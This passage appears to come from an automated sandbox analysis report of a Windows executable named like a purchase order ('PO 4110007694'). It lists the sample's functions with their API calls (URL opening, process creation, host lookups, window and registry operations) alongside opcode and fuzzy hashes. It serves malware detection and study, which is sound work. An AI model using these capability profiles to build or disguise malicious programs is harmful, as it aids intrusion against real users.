                                                                      • Part of subcall function 00C8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
                                                                      • Part of subcall function 00C8182D: InternetCloseHandle.WININET(00000000), ref: 00C818E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                    • Instruction ID: c38049bb38c6b757ea4bb7fcc483d7727b519e5d5ec1fee16e8e11bacdb13982
                                                                    • Opcode Fuzzy Hash: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                    • Instruction Fuzzy Hash: 0721B031200605BFEB12AF609C05BBABBEDFB48714F15402EFD11D6591D7719912A7A8
                                                                    Function 00C73A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,00C9FAC0), ref: 00C73A64
                                                                    • GetLastError.KERNEL32 ref: 00C73A73
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C73A82
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C9FAC0), ref: 00C73ADF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                    • Instruction ID: 6d4998f2749193e1c765ee0c2ee59eb9f589097cbd7bad9a92dbd81b5281b699
                                                                    • Opcode Fuzzy Hash: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                    • Instruction Fuzzy Hash: B42196345082419F8700DF64C8469AA77E8AF55364F108A2DF4ADC72A1DB31DA46FB52
                                                                    Function 00C6DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?), ref: 00C6F0CB
                                                                      • Part of subcall function 00C6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6F0F1
                                                                      • Part of subcall function 00C6F0BC: lstrcmpiW.KERNEL32(00000000,?,00C6DCD3,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?), ref: 00C6F122
                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DCEC
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DD12
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C6DD46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 42b66bad0dfad346d7b71a847a0310c95a6fd5f8ed279e33af0b531ea740b388
                                                                    • Instruction ID: 295ebe9d48e36966142b6ab5a69ec8a76c945dc140dac8786281d1b53966bbc9
                                                                    • Opcode Fuzzy Hash: 42b66bad0dfad346d7b71a847a0310c95a6fd5f8ed279e33af0b531ea740b388
                                                                    • Instruction Fuzzy Hash: CD11B136200305EBCB25AF34D885E7E77A8FF45310F40412AF916CB2A0EB719951D7E0
                                                                    Function 00C450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00C45101
                                                                      • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 0c1da0b230e5ce336545f6a48d938376deae0bba0a1fa17626ff119a1c6c4465
                                                                    • Instruction ID: 13edf516b30ecaceb460c4bb7d6bf55e017afab16dc87bef815bdeeb64ade081
                                                                    • Opcode Fuzzy Hash: 0c1da0b230e5ce336545f6a48d938376deae0bba0a1fa17626ff119a1c6c4465
                                                                    • Instruction Fuzzy Hash: 82112572910B16AFCF312F70EC45B6E3798BF043B1F20453AF9549A162DF348A41A790
                                                                    Function 00C144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C144CF
                                                                      • Part of subcall function 00C1407C: _memset.LIBCMT ref: 00C140FC
                                                                      • Part of subcall function 00C1407C: _wcscpy.LIBCMT ref: 00C14150
                                                                      • Part of subcall function 00C1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00C14524
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C14533
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4D4B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    • Opcode ID: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
                                                                    • Instruction ID: 28b689c6d4744d33d60c357d80f2f97e16dc04fb143cd38ab83b8f2afbc83032
                                                                    • Opcode Fuzzy Hash: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
                                                                    • Instruction Fuzzy Hash: 1F21D7749047849FE7329B249859BEABFECAF06314F04009EE69E96281C3742A84DB51
                                                                    Function 00C86369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00C86399
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C863A4
                                                                    • _memmove.LIBCMT ref: 00C863D1
                                                                    • inet_ntoa.WSOCK32(?), ref: 00C863DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 1504782959-0
                                                                    • Opcode ID: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
                                                                    • Instruction ID: fc6ef54e1b00a237a5d30bde10373d65a2e187aa3645078cfa21622ed82ff5c8
                                                                    • Opcode Fuzzy Hash: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
                                                                    • Instruction Fuzzy Hash: 38116A32A00109AFCB00FBA4D996DEEB7B8AF46314B144029F506A71A1DB30AE45EB61
                                                                    Function 00C68B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C68B61
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B73
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B89
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
                                                                    • Instruction ID: 0bf4a307a42d2b0783223c42271578401e490f1a5ad941a00280c68c1ab9c052
                                                                    • Opcode Fuzzy Hash: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
                                                                    • Instruction Fuzzy Hash: EB114879900218FFEB10DFA5CC84FADBBB8FB48710F2041A5EA00B7290DA716E11DB94
                                                                    Function 00C11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                    • GetClientRect.USER32(?,?), ref: 00C4B5FB
                                                                    • GetCursorPos.USER32(?), ref: 00C4B605
                                                                    • ScreenToClient.USER32(?,?), ref: 00C4B610
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
                                                                    • Instruction ID: 6093e05c8943fdc780a28df3f302bdeeaa60c5b25e83acd55e57a7c6145d6008
                                                                    • Opcode Fuzzy Hash: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
                                                                    • Instruction Fuzzy Hash: 46114F35501519EFCF10DF94D889AFE77B8FB06301F500456FA11E7140C734BA91ABA5
                                                                    Function 00C71142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7115F
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C71184
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7118E
                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C711C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
                                                                    • Instruction ID: 5fe38581faccbbff050cbab263b6ff1adca4508e26904a91e3b881f7d908a2d5
                                                                    • Opcode Fuzzy Hash: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
                                                                    • Instruction Fuzzy Hash: 49111831D00519D7CF009FA9D848BEEBB78FB09711F45805AEE49BA240CA7096918BD5
                                                                    Function 00C6D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C6D84D
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C6D864
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C6D879
                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C6D897
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                    • String ID:
                                                                    • API String ID: 1352324309-0
                                                                    • Opcode ID: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
                                                                    • Instruction ID: 3cea9cc6f9f50ade89539c62445402cf97d2c3360b5d212d3a247a8fafbdb548
                                                                    • Opcode Fuzzy Hash: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
                                                                    • Instruction Fuzzy Hash: 07113C75A05304DBE3308F51EC8CF96BBA8EB04B00F10856EA516D7490D7B0E9599BE1
                                                                    Function 00C46FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction ID: 8e73ab37c2f9a5662a012a2a8027ab79e84fa5f27f1d9272b33d85548fe73d8f
                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction Fuzzy Hash: FD014C7244914ABBCF265F84DC45CEE3F62BB18350F598615FE6858031D336DAB1AB81
                                                                    Function 00C9B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00C9B2E4
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9B2FC
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9B320
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9B33B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
                                                                    • Instruction ID: a0ecb9ed76821816613781fd249f46d5cc607f48fe0bb36ead2adec8e1b9ceb8
                                                                    • Opcode Fuzzy Hash: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
                                                                    • Instruction Fuzzy Hash: BB114675D00209EFDB41CF99D544AEEFBB5FB08310F104166E914E3220D735AA558F50
                                                                    Function 00C9B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9B644
                                                                    • _memset.LIBCMT ref: 00C9B653
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CD6F20,00CD6F64), ref: 00C9B682
                                                                    • CloseHandle.KERNEL32 ref: 00C9B694
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
                                                                    • Instruction ID: dc33c1d946d72277de47355d71f1b9cab80c19e0a72d24edec0d96a26c373ffe
                                                                    • Opcode Fuzzy Hash: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
                                                                    • Instruction Fuzzy Hash: A0F05EF26417047AE61027A1BC0AFBF3B9CEB08395F004026FA08E51A2D7755C01C7A8
                                                                    Function 00C76BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00C76BE6
                                                                      • Part of subcall function 00C776C4: _memset.LIBCMT ref: 00C776F9
                                                                    • _memmove.LIBCMT ref: 00C76C09
                                                                    • _memset.LIBCMT ref: 00C76C16
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00C76C26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                    • String ID:
                                                                    • API String ID: 48991266-0
                                                                    • Opcode ID: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
                                                                    • Instruction ID: b074a19c5e74b8d709c276a97a4389888d781d9a934d997cc97994ab19e11287
                                                                    • Opcode Fuzzy Hash: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
                                                                    • Instruction Fuzzy Hash: D4F05E3A200100ABCF016F55EC89B8ABB2AEF45361F14C066FE089E227C731E811DBB4
                                                                    Function 00C12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00C12231
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00C1223B
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00C12250
                                                                    • GetStockObject.GDI32(00000005), ref: 00C12258
                                                                    • GetWindowDC.USER32(?,00000000), ref: 00C4BE83
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4BE90
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00C4BEA9
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00C4BEC2
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00C4BEE2
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00C4BEED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
